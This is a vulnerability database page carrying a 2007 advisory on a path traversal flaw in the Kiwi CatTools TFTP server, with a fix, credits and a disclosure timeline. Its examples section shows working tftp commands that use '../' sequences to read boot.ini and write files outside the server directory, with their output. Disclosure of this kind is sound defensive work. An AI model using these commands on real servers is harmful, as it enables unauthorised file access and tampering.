Vulners
Lucene search
Kiwi CatTools TFTP <= 3.2.8 Remote Path Traversal Vulnerability
Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8
server can lead to information disclosure and remote code execution
Risk: High
DISCUSSION
Kiwi CatTools TFTP server doesn.t properly verify filename in PUT and
GET request which can be used to download/upload any file from/to
server. Default setting allows replacing of existing files. Such
settings lead to probability to replace an executable files and run code
on attacker choice.
EXAMPLES
C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt
Transfer successful: 212 bytes in 1 second, 212 bytes/s
C:\>type boot.txt
[boot loader] timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt
Transfer successful: 212 bytes in 1 second, 212 bytes/s
C:\>type pttest.txt
[boot loader] timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
C:\>
SOLUTION
Upgrade to CatTools 3.2.9 which is available for download at
http://www.kiwisyslog.com/downloads.php
CREDITS
Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)
DISCLOSURE TIMELINE
Vulnerability discovered: 11/20/2006
Initial vendor contact: 12/08/2006
Patch released: 02/13/2007
Public disclosure: 02/27/2007
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Feb 2007 00:00Current
7.1High risk
Vulners AI Score7.1